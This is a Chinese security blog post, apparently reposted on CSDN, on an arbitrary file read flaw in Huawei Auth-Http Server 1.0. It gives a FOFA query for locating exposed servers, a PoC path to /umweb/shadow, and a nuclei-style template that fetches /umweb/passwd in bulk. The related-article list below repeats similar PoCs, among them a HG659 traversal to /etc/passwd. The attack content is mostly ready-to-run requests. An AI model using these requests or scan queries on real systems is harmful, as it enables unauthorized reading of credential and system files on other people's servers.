华为Auth-Http Serve任意文件读取

已于 2023-11-10 15:54:19 修改
阅读量4.4k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Web漏洞 文章标签: 服务器 运维
于 2023-11-09 15:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/134304879

公众号:掌控安全EDU 分享更多技术文章,欢迎关注一起探讨学习

1.漏洞描述

华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。

2.网络资产查找

FOFA:server=”Huawei Auth-Http Server 1.0”

2、部分界面如下

3、Poc

/umweb/shadow

4、Poc批量验证

id: huanwei-auth-http-server-fileread

info:
name: 华为Auth-Http Server 1.0任意文件读取
author:
severity: medium
description: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过此漏洞获取敏感信息。

reference:
- https://
metadata:
fofa-query: server="Huawei Auth-Http Server 1.0"
verified: true
max-request: 1

http:
- raw:
- |
GET /umweb/passwd HTTP/1.1
Host: {{Hostname}}


matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"root")'

Huawei Auth-HTTP Server 1.0 任意文件读取
weixin_43567873的博客
03-09 1503
Huawei Auth-HTTP Server 1.0 任意文件读取
华为 Auth-HTTP Server 1.0 任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-12 2212
华为 Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。该服务存在任意文件读取漏洞。
【漏洞复现】华为Auth-Http服务存在任意文件读取
知黑而守白
12-19 1300
华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件
华为Auth-HTTP服务器任意文件读取漏洞
fly夏天的博客
12-27 5763
文章复现了华为auth-http服务器任意文件读取漏洞并提供了简单的利用方法
漏洞复现-华为Auth-HTTP服务器任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-11 2830
漏洞复现-华为Auth-HTTP服务器任意文件读取漏洞,附带自己写的poc脚本
Huawei Auth-HTTP Server 1.0 存在任意文件读取漏洞 附POC软件
nnn2188185的博客
12-12 1659
Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。
华为Auth-HTTP服务器任意文件读取漏洞处理
最新发布
静宁宇思
12-29 3513
处理方式:关闭web-authentication服务。华为防火墙认证服务漏洞。
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞POC
07-05
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有Huawei Auth-Http相关资产(fofa脚本下载地址:) python3 fofa-cwillchris.py -k body="umweb/u20.png" 然后用此脚本 ./poc.bin -l url.txt
漏洞复现--Huawei-Auth-HTTP-任意文件读取
qq_53003652的博客
12-22 2161
Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。该产品存在任意文件读取漏洞。
HUAWEI HG659任意文件读取漏洞
chaojixiaojingang
08-03 1427
1.漏洞描述 HUAWEI HG659 lib存在任意文件读取漏洞,攻击者可通过该漏洞读取任意文件。 2.网络资产查找 FOFA:app="HUAWEI-Home-Gateway-HG659" 3.POC /lib///....//....//....//....//....//....//....//....//etc//passwd 4.漏洞复现 1)访问HUWEI HG659页面 2)在URL后添加POC ...
auth-server-demo:Spring授权服务器0.1.0 && Spring Boot 2.4.2
05-12
授权码认证 curl --location --request GET ' http://localhost:3000/oauth2/authorize?client_id=pig&client_secret=pig&response_type=code&redirect_uri=http://localhost:8080/renren-admin/sys/oauth2-sso ' 获取令牌 curl --location --request POST ' http://localhost:3000/oauth2/token ' \ --header ' Authorization: Basic cGlnOnBpZw== ' \ --header ' Content-Type: application/x-www-form-urlencoded ' \ --data-urlencode '
华为网络设备&服务器默认口令汇总.xls
08-07
华为网络设备与服务器默认口令汇总,这才是网工的宝典之一,不管做甲方还是做乙方,在国内华为的设备还是很常见的。
【漏洞复现】华为Auth-Http服务文件读取漏洞
晚风不及你
12-18 3667
Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。
HUAWEI HG659 lib 任意文件读取漏洞
weixin_51387754的博客
11-30 1117
标题 HUAWEI HG659 lib 存在任意文件读取漏洞,攻击者通过漏洞可以读取任意文件 漏洞复现 /lib///....//....//....//....//....//....//....//....//etc//passwd
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞
Cwillchris的博客
07-05 3099
/Huawei-Auth-Http-Server1.0passwd文件泄露.bin -l 1.txt (将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。先用fofa脚本爬取所有碧海威相关资产(
任意文件读取及漏洞复现
来日可期的博客
08-31 5403
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
OAuth1.0 简介及安全分析
iteye_6700的博客
09-28 427
1.   概述 OAuth 是一个开放授权协议,允许第三方应用访问服务提供方中注册的终端用户的某些资源,且不会把帐号和密码提供给第三方。 OAuth 允许通过服务提供商授予的一个临时令牌而不是用户名密码来获取用户的资源,这些资源可以是受限的,令牌的时间段也可以是受限的。 1.1     OAuth 的参与者 1.       终端用户 存放在服务提供方的受...
php http类库,php auth_http类库进行身份效验
weixin_34489089的博客
04-01 179
php auth_http类库进行身份效验复制代码 代码如下:require_once("Auth/HTTP.php");//设置数据库的连接选项$auth_options=array('dsn'=>"mysql://root:1981427@localhost/test", //数据库连接字符串'table'=>"tablename1", //表名'usernamecol'=>...
华为汇聚交换机上配置Portal认证实现用户访问网络
m0_46129105的博客
03-09 3934
华为汇聚交换机上配置Portal认证实现用户访问网络 前提条件:已完成基础网络连通性配置,交换机到Radius服务器,DNS服务器,URL域名对应IP都要可达。 1.创建radius server模板"HUAWEI" radius-server template HUAWEI radius-server shared-key cipher Huawei@123 radius-server authentication 192.168.0.1 1812 source ip-address 1.1.1.1 w
huawei auth-http server 1.0
09-01
Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。 Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。 此外,Huawei Auth-HTTP Server 1.0 还具备安全审计与日志功能,可以记录和追踪用户的访问活动,为企业的安全风险管理提供重要的数据支持。它可以生成详细的访问日志,包括用户身份、访问时间、访问内容等信息,帮助企业了解和分析网络访问情况,及时发现异常活动和潜在的安全威胁。 Huawei Auth-HTTP Server 1.0 还提供了可视化的管理界面,管理员可以通过简单直观的操作完成用户账号的创建、配置角色权限、管理访问策略等任务,提高工作效率。同时,它支持高可用和容灾机制,能够保证身份认证和授权服务的持续可用性,降低系统故障对业务造成的影响。 总之,Huawei Auth-HTTP Server 1.0 是一款功能强大、安全可靠的身份验证和授权解决方案,能够有效保护企业的资源和网络安全,提供用户友好的身份认证体验,是企业网络安全管理中的重要工具。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值